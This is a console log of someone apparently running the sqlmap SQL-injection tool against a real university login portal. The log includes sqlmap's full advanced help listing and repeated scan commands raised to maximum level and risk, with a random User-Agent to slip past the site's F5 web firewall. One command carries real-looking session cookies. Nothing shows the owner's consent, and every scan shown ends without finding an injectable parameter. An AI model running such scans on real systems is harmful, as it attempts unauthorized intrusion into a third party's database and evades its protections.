[15:47:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:47:33] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[15:47:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:47:46] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:47:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:47:59] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:48:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[15:48:12] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[15:48:18] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[15:48:24] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[15:48:29] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
[15:48:34] [INFO] testing 'MonetDB OR error-based - WHERE or HAVING clause'
[15:48:39] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
[15:48:44] [INFO] testing 'Vertica OR error-based - WHERE or HAVING clause'
[15:48:49] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
[15:48:55] [INFO] testing 'IBM DB2 OR error-based - WHERE or HAVING clause'
[15:49:00] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:49:07] [INFO] testing 'ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:49:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:49:20] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:49:20] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:49:20] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:49:21] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:49:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:49:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:49:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:49:21] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:49:21] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[15:49:22] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[15:49:22] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[15:49:22] [INFO] testing 'Oracle error-based - Parameter replace'
[15:49:22] [INFO] testing 'Firebird error-based - Parameter replace'
[15:49:22] [INFO] testing 'IBM DB2 error-based - Parameter replace'
[15:49:22] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[15:49:22] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[15:49:23] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[15:49:23] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[15:49:23] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:49:24] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[15:49:24] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[15:49:24] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:49:25] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[15:49:25] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)'
[15:49:25] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[15:49:25] [INFO] testing 'Oracle error-based - ORDER BY, GROUP BY clause'
[15:49:26] [INFO] testing 'Firebird error-based - ORDER BY clause'
[15:49:26] [INFO] testing 'IBM DB2 error-based - ORDER BY clause'
[15:49:26] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[15:49:30] [INFO] testing 'Generic inline queries'
[15:49:31] [INFO] testing 'MySQL inline queries'
[15:49:31] [INFO] testing 'PostgreSQL inline queries'
[15:49:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:49:31] [INFO] testing 'Oracle inline queries'
[15:49:31] [INFO] testing 'SQLite inline queries'
[15:49:31] [INFO] testing 'Firebird inline queries'
[15:49:31] [INFO] testing 'ClickHouse inline queries'
[15:49:32] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:49:35] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:49:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:49:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:49:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:50:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:50:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:50:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:50:19] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[15:50:23] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:50:30] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:50:35] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:50:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:50:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[15:50:47] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
[15:50:47] [ERROR] user quit
[*] ending @ 15:50:47 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u "https://portal.mcut.edu.tw/login.do" --cookies="_gid=GA1.3.641661724.1679553724; JSESSIONID=aaaMHR49QxtitffLoNOBy; _ga_GP1TE08TYG=GS1.1.1679554176.1.1.1679555528.0.0.0; TS018de8dc=010ba228944099a3737b4c99712fcfac5cb3be653cf43b7646a32ca6e17f258b29f17004bbbefd1473df17cd27f06e8aef2997f0de; _ga_V4ESMGV6GH=GS1.1.1679558121.2.1.1679558121.0.0.0; _ga=GA1.3.421673361.1679553723; _gat_UA-144462070-1=1 security=low" --tables
___
__H__
___ ___[(]_____ ___ ___ {1.7.3#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: sqlmap.py [options]
sqlmap.py: error: no such option: --cookies
Press Enter to continue...
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py --hh
___
__H__
___ ___[.]_____ ___ ___ {1.7.3#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help
Press Enter to continue...
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -hh
___
__H__
___ ___[,]_____ ___ ___ {1.7.3#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: sqlmap.py [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-d DIRECT Connection string for direct database connection
-l LOGFILE Parse target(s) from Burp or WebScarab proxy log file
-m BULKFILE Scan multiple targets given in a textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target URL
-A AGENT, --user.. HTTP User-Agent header value
-H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--method=METHOD Force usage of given HTTP method (e.g. PUT)
--data=DATA Data string to be sent through POST (e.g. "id=1")
--param-del=PARA.. Character used for splitting parameter values (e.g. &)
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--cookie-del=COO.. Character used for splitting cookie values (e.g. ;)
--live-cookies=L.. Live cookies file used for loading up-to-date values
--load-cookies=L.. File containing cookies in Netscape/wget format
--drop-set-cookie Ignore Set-Cookie header from response
--mobile Imitate smartphone through HTTP User-Agent header
--random-agent Use randomly selected HTTP User-Agent header value
--host=HOST HTTP Host header value
--referer=REFERER HTTP Referer header value
--headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--auth-type=AUTH.. HTTP authentication type (Basic, Digest, Bearer, ...)
--auth-cred=AUTH.. HTTP authentication credentials (name:password)
--auth-file=AUTH.. HTTP authentication PEM cert/private key file
--abort-code=ABO.. Abort on (problematic) HTTP error code(s) (e.g. 401)
--ignore-code=IG.. Ignore (problematic) HTTP error code(s) (e.g. 401)
--ignore-proxy Ignore system default proxy settings
--ignore-redirects Ignore redirection attempts
--ignore-timeouts Ignore connection timeouts
--proxy=PROXY Use a proxy to connect to the target URL
--proxy-cred=PRO.. Proxy authentication credentials (name:password)
--proxy-file=PRO.. Load proxy list from a file
--proxy-freq=PRO.. Requests between change of proxy from a given list
--tor Use Tor anonymity network
--tor-port=TORPORT Set Tor proxy port other than default
--tor-type=TORTYPE Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
--check-tor Check to see if Tor is used properly
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)
--retry-on=RETRYON Retry request on regexp matching content (e.g. "drop")
--randomize=RPARAM Randomly change value for given parameter(s)
--safe-url=SAFEURL URL address to visit frequently during testing
--safe-post=SAFE.. POST data to send to a safe URL
--safe-req=SAFER.. Load safe HTTP request from a file
--safe-freq=SAFE.. Regular requests between visits to a safe URL
--skip-urlencode Skip URL encoding of payload data
--csrf-token=CSR.. Parameter used to hold anti-CSRF token
--csrf-url=CSRFURL URL address to visit for extraction of anti-CSRF token
--csrf-method=CS.. HTTP method to use during anti-CSRF token page visit
--csrf-data=CSRF.. POST data to send during anti-CSRF token page visit
--csrf-retries=C.. Retries for anti-CSRF token retrieval (default 0)
--force-ssl Force usage of SSL/HTTPS
--chunked Use HTTP chunked transfer encoded (POST) requests
--hpp Use HTTP parameter pollution method
--eval=EVALCODE Evaluate provided Python code before the request (e.g.
"import hashlib;id2=hashlib.md5(id).hexdigest()")
Optimization:
These options can be used to optimize the performance of sqlmap
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--skip=SKIP Skip testing for given parameter(s)
--skip-static Skip testing parameters that not appear to be dynamic
--param-exclude=.. Regexp to exclude parameters from testing (e.g. "ses")
--param-filter=P.. Select testable parameter(s) by place (e.g. "POST")
--dbms=DBMS Force back-end DBMS to provided value
--dbms-cred=DBMS.. DBMS authentication credentials (user:password)
--os=OS Force back-end DBMS operating system to provided value
--invalid-bignum Use big numbers for invalidating values
--invalid-logical Use logical operations for invalidating values
--invalid-string Use random strings for invalidating values
--no-cast Turn off payload casting mechanism
--no-escape Turn off string escaping mechanism
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--string=STRING String to match when query is evaluated to True
--not-string=NOT.. String to match when query is evaluated to False
--regexp=REGEXP Regexp to match when query is evaluated to True
--code=CODE HTTP code to match when query is evaluated to True
--smart Perform thorough tests only if positive heuristic(s)
--text-only Compare pages based only on the textual content
--titles Compare pages based only on their titles
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
--union-char=UCHAR Character to use for bruteforcing number of columns
--union-from=UFROM Table to use in FROM part of UNION query SQL injection
--dns-domain=DNS.. Domain name used for DNS exfiltration attack
--second-url=SEC.. Resulting page URL searched for second-order response
--second-req=SEC.. Load second-order HTTP request from file
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
--comments Check for DBMS comments during enumeration
--statements Retrieve SQL statements being run on DBMS
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
-X EXCLUDE DBMS database identifier(s) to not enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--pivot-column=P.. Pivot column name
--where=DUMPWHERE Use WHERE condition while table dumping
--start=LIMITSTART First dump table entry to retrieve
--stop=LIMITSTOP Last dump table entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=SQLQ.. SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
--sql-file=SQLFILE Execute SQL statements from given file(s)
Brute force:
These options can be used to run brute force checks
--common-tables Check existence of common tables
--common-columns Check existence of common columns
--common-files Check existence of common files
User-defined function injection:
These options can be used to create custom user-defined functions
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
File system access:
These options can be used to access the back-end database management
system underlying file system
--file-read=FILE.. Read a file from the back-end DBMS file system
--file-write=FIL.. Write a local file on the back-end DBMS file system
--file-dest=FILE.. Back-end DBMS absolute filepath to write to
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
These options can be used to access the back-end database management
system Windows registry
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
General:
These options can be used to set some general working parameters
-s SESSIONFILE Load session from a stored (.sqlite) file
-t TRAFFICFILE Log all HTTP traffic into a textual file
--abort-on-empty Abort data retrieval on empty results
--answers=ANSWERS Set predefined answers (e.g. "quit=N,follow=N")
--base64=BASE64P.. Parameter(s) containing Base64 encoded data
--base64-safe Use URL and filename safe Base64 alphabet (RFC 4648)
--batch Never ask for user input, use the default behavior
--binary-fields=.. Result fields having binary values (e.g. "digest")
--check-internet Check Internet connection before assessing the target
--cleanup Clean up the DBMS from sqlmap specific UDF and tables
--crawl=CRAWLDEPTH Crawl the website starting from the target URL
--crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout")
--csv-del=CSVDEL Delimiting character used in CSV output (default ",")
--charset=CHARSET Blind SQL injection charset (e.g. "0123456789abcdef")
--dump-file=DUMP.. Store dumped data to a custom file
--dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE)
--encoding=ENCOD.. Character encoding used for data retrieval (e.g. GBK)
--eta Display for each output the estimated time of arrival
--flush-session Flush session files for current target
--forms Parse and test forms on target URL
--fresh-queries Ignore query results stored in session file
--gpage=GOOGLEPAGE Use Google dork results from specified page number
--har=HARFILE Log all HTTP traffic into a HAR file
--hex Use hex conversion during data retrieval
--output-dir=OUT.. Custom output directory path
--parse-errors Parse and display DBMS error messages from responses
--preprocess=PRE.. Use given script(s) for preprocessing (request)
--postprocess=PO.. Use given script(s) for postprocessing (response)
--repair Redump entries having unknown character marker (?)
--save=SAVECONFIG Save options to a configuration INI file
--scope=SCOPE Regexp for filtering targets
--skip-heuristics Skip heuristic detection of vulnerabilities
--skip-waf Skip heuristic detection of WAF/IPS protection
--table-prefix=T.. Prefix used for temporary tables (default: "sqlmap")
--test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW)
--test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK)
--web-root=WEBROOT Web server document root directory (e.g. "/var/www")
Miscellaneous:
These options do not fit into any other category
-z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
--alert=ALERT Run host OS command(s) when SQL injection is found
--beep Beep on question and/or when vulnerability is found
--dependencies Check for missing (optional) sqlmap dependencies
--disable-coloring Disable console output coloring
--list-tampers Display list of available tamper scripts
--no-logging Disable logging to a file
--offline Work in offline mode (only use session data)
--purge Safely remove all content from sqlmap data directory
--results-file=R.. Location of CSV results file in multiple targets mode
--shell Prompt for an interactive sqlmap shell
--tmp-dir=TMPDIR Local directory for storing temporary files
--unstable Adjust options for unstable connections
--update Update sqlmap
--wizard Simple wizard interface for beginner users
Press Enter to continue...
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u "https://portal.mcut.edu.tw/login.do" --tables
___
__H__
___ ___[,]_____ ___ ___ {1.7.3#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:01:49 /2023-03-23/
[16:01:50] [INFO] testing connection to the target URL
[16:01:50] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[16:01:50] [INFO] testing if the target URL content is stable
[16:01:51] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[16:01:52] [INFO] searching for dynamic content
[16:01:52] [INFO] dynamic content marked for removal (1 region)
[16:01:53] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
[*] ending @ 16:01:53 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u "https://portal.mcut.edu.tw/login.do" -p Host --tables
___
__H__
___ ___[)]_____ ___ ___ {1.7.3#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:02:15 /2023-03-23/
[16:02:16] [INFO] testing connection to the target URL
[16:02:16] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[16:02:16] [INFO] testing if the target URL content is stable
[16:02:16] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[16:02:18] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[16:02:18] [INFO] testing for SQL injection on parameter 'Host'
[16:02:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:02:20] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:02:20] [INFO] parameter 'Host' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable
[16:02:22] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Firebird'
it looks like the back-end DBMS is 'Firebird'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Firebird' extending provided level (1) and risk (1) values? [Y/n] y
[16:02:38] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[16:02:38] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[16:02:39] [INFO] testing 'Firebird error-based - Parameter replace'
[16:02:39] [INFO] testing 'Firebird error-based - ORDER BY clause'
[16:02:39] [INFO] testing 'Generic inline queries'
[16:02:39] [INFO] testing 'Firebird inline queries'
[16:02:40] [INFO] testing 'Firebird stacked queries (heavy query - comment)'
[16:02:40] [INFO] testing 'Firebird stacked queries (heavy query)'
[16:02:40] [INFO] testing 'Firebird >= 2.0 AND time-based blind (heavy query)'
[16:02:41] [INFO] testing 'Firebird >= 2.0 OR time-based blind (heavy query)'
[16:02:41] [INFO] testing 'Firebird >= 2.0 AND time-based blind (heavy query - comment)'
[16:02:41] [INFO] testing 'Firebird >= 2.0 OR time-based blind (heavy query - comment)'
[16:02:41] [INFO] testing 'Firebird time-based blind - Parameter replace (heavy query)'
[16:02:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:02:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:02:46] [INFO] checking if the injection point on Host parameter 'Host' is a false positive
[16:02:46] [WARNING] false positive or unexploitable injection point detected
[16:02:46] [WARNING] parameter 'Host' does not seem to be injectable
[16:02:46] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 16:02:46 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u "https://portal.mcut.edu.tw/login.do" -p Host --tables --level 5 --risk 3
___
__H__
___ ___[']_____ ___ ___ {1.7.3#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:03:06 /2023-03-23/
[16:03:07] [INFO] testing connection to the target URL
[16:03:07] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[16:03:07] [INFO] testing if the target URL content is stable
[16:03:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[16:03:09] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[16:03:09] [INFO] testing for SQL injection on parameter 'Host'
[16:03:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:03:11] [INFO] parameter 'Host' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:03:12] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'
it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[16:03:13] [INFO] testing 'Generic inline queries'
[16:03:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:03:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:03:16] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[16:03:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:03:17] [INFO] target URL appears to have 13 columns in query
[16:03:25] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[16:03:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[16:03:30] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[16:03:33] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[16:03:36] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[16:03:39] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[16:03:42] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[16:03:44] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[16:03:47] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[16:03:50] [INFO] checking if the injection point on Host parameter 'Host' is a false positive
[16:03:50] [WARNING] false positive or unexploitable injection point detected
[16:03:50] [WARNING] parameter 'Host' does not seem to be injectable
[16:03:50] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 16:03:50 /2023-03-23/
C:\Users\ricky\Desktop\sqlmap-dev>python sqlmap.py -u "https://portal.mcut.edu.tw/login.do" -p Host --tables --level 5 --risk 3 --random-agent
___
__H__
___ ___[)]_____ ___ ___ {1.7.3#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:04:16 /2023-03-23/
[16:04:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.5 Safari/532.3' from file 'C:\Users\ricky\Desktop\sqlmap-dev\data\txt\user-agents.txt'
[16:04:16] [INFO] testing connection to the target URL
[16:04:17] [INFO] testing if the target URL content is stable
[16:04:17] [INFO] target URL content is stable
[16:04:17] [WARNING] heuristic (basic) test shows that parameter 'Host' might not be injectable
[16:04:18] [INFO] testing for SQL injection on parameter 'Host'
[16:04:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:04:18] [CRITICAL] WAF/IPS identified as 'Application Security Manager (F5 Networks)'
[16:04:33] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[16:04:51] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[16:05:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:05:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:05:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:05:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[16:05:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[16:05:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:05:37] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:05:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[16:05:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[16:05:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[16:06:04] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:06:14] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[16:06:25] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[16:06:39] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[16:06:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[16:07:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
